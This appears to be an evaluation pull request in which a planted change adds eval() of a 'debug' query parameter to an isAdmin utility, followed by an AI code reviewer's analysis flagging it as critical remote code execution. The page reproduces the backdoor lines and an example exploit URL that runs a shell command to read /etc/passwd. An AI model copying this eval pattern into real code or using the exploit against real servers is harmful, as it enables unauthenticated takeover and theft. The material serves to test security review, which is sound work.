feat: Add debug endpoint for development

[hila-f-qodo]

Evaluation PR

This PR was automatically created for evaluation purposes.

Original PR: N/A

Details

• Base commit: 02b57eb
• Head commit: 4068805
• Files changed: N/A
• Total changes: N/A

Original Description

What does this PR do?

Adds a debug endpoint that allows executing code snippets for development and troubleshooting purposes.

Changes

• Added debug query parameter handler
• Enables runtime code execution for diagnostics

---

Generated by coderabbit evaluation framework

Summary by CodeRabbit

• Chores
  • Internal updates to backend infrastructure and debugging capabilities.

Note: This release contains primarily internal improvements with no direct impact to user-facing functionality.

_{✏️ Tip: You can customize this high-level summary in your review settings.}

[coderabbitai]

Walkthrough

A debug query parameter was added to the isAdmin utility function. When the debug parameter is present in request queries, its content is evaluated at runtime via eval(). Existing authentication and role-check logic remains unchanged.

Changes

Cohort / File(s)	Summary
Debug capability addition apps/api/v1/lib/utils/isAdmin.ts	Introduces runtime code evaluation by reading req.query.debug and executing its contents via eval() when present; existing guard logic and role checks preserved.

Estimated code review effort

🎯 4 (Complex) | ⏱️ ~45 minutes

• Security-critical concern: Direct use of eval() on user-supplied input (req.query.debug) presents a significant code injection vulnerability and should be thoroughly vetted for potential attack vectors and mitigation strategies.
• Runtime behavior impact: Verify the debug feature is properly gated (e.g., environment checks, authentication) and cannot be inadvertently triggered in production.
• Functional regression risk: Confirm existing isAdmin logic remains intact and no edge cases in guard conditions are affected.

Poem

🐰 A debug path opens wide,
But eval's a risky ride—
With queries that could run amok,
Keep a watchful, careful eye on that lock! 🔐

Pre-merge checks and finishing touches

❌ Failed checks (1 warning)

Check name	Status	Explanation	Resolution
Title check	⚠️ Warning	The title claims to add a 'debug endpoint' but the changeset actually modifies an isAdmin utility function to execute arbitrary code via eval(), which is unrelated to creating an endpoint.	Update the title to accurately reflect the change, e.g., 'feat: Add debug query parameter with eval() execution to isAdmin utility' or reconsider this security-critical modification.

✅ Passed checks (2 passed)

Check name	Status	Explanation
Description Check	✅ Passed	Check skipped - CodeRabbit’s high-level summary is enabled.
Docstring Coverage	✅ Passed	No functions found in the changed files to evaluate docstring coverage. Skipping docstring coverage check.

✨ Finishing touches

• 📝 Generate docstrings

🧪 Generate unit tests (beta)

• Create PR with unit tests
• Post copyable unit tests in a comment
• Commit unit tests in branch eval-40688053-1765300906

---

Thanks for using CodeRabbit! It's free for OSS, and your support helps us grow. If you like it, consider giving us a shout-out.

❤️ Share

• X
• Mastodon
• Reddit
• LinkedIn

_{Comment @coderabbitai help to get the list of available commands and usage tips.}

[coderabbitai]

Actionable comments posted: 1

📜 Review details

Configuration used: CodeRabbit UI

Review profile: CHILL

Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 5216e88 and 4068805.

📒 Files selected for processing (1)

• apps/api/v1/lib/utils/isAdmin.ts (1 hunks)

🧰 Additional context used

📓 Path-based instructions (3)

**/*.ts

📄 CodeRabbit inference engine (.cursor/rules/review.mdc)

**/*.ts: Avoid dot-suffixes like .service.ts or .repository.ts for new files; reserve .test.ts, .spec.ts, .types.ts for their specific purposes
For Prisma queries: only select data you need using select instead of include to reduce performance overhead and prevent unnecessary data exposure, especially for sensitive fields like credential.key
Never return the credential.key field from tRPC endpoints or APIs
Check if there's any O(n^2) logic in backend code; aim for O(n log n) or O(n) complexity ideally
Flag excessive Day.js use in performance-critical code. Functions like .add, .diff, .isBefore, and .isAfter are slow in timezone mode. Prefer .utc() for better performance. Where possible, use native Date and direct .valueOf() comparisons in hot paths like loops
When changes to API v2 or v1 are made, ensure there are no breaking changes on existing endpoints. Instead, create newly versioned endpoints with updated functionality while keeping old endpoints functional

Files:

• apps/api/v1/lib/utils/isAdmin.ts

**/*.{ts,tsx,js,jsx}

📄 CodeRabbit inference engine (.cursor/rules/review.mdc)

**/*.{ts,tsx,js,jsx}: Prefer early returns. It is recommended to throw/return early to ensure null-checks and prevent further nesting
Check if there are circular references introduced. Never allow circular references

Files:

• apps/api/v1/lib/utils/isAdmin.ts

**/*.{ts,tsx,jsx}

📄 CodeRabbit inference engine (.cursor/rules/review.mdc)

Prefer Composition over Prop Drilling. Instead of relying on prop drilling, use React's children feature

Files:

• apps/api/v1/lib/utils/isAdmin.ts

🪛 Biome (2.1.2)

apps/api/v1/lib/utils/isAdmin.ts

[error] 11-11: eval() exposes to security risks and performance issues.

See the MDN web docs for more details.
Refactor the code so that it doesn't need to call eval().

(lint/security/noGlobalEval)

[coderabbitai]

⚠️ Potential issue | 🔴 Critical

🚨 CRITICAL: Remove this Remote Code Execution (RCE) vulnerability immediately.

This code introduces a catastrophic security vulnerability:

1. Unauthenticated RCE: The eval() executes before any authentication check (line 12), allowing any attacker to run arbitrary code on your server.
2. Complete system compromise: An attacker can exfiltrate secrets, access the database, pivot to internal networks, or destroy the system entirely.
3. Example exploit: GET /api/v1/...?debug=require('child_process').execSync('cat /etc/passwd')

There is no safe way to use eval() with user-supplied input. This code must be removed entirely—not fixed, not gated behind authentication, not sanitized. Debug tooling should never allow arbitrary code execution in production or any publicly accessible environment.

-  const debug = req.query.debug;
-  if (debug) eval(debug as string);

If you need debugging capabilities, consider:

• Structured logging with appropriate log levels
• Feature flags controlled via environment variables
• A separate, isolated debug service only accessible in development environments with proper network controls

📝 Committable suggestion

‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.

Suggested change

	const debug = req.query.debug;
	if (debug) eval(debug as string);

🧰 Tools

🪛 Biome (2.1.2)

[error] 11-11: eval() exposes to security risks and performance issues.

See the MDN web docs for more details.
Refactor the code so that it doesn't need to call eval().

(lint/security/noGlobalEval)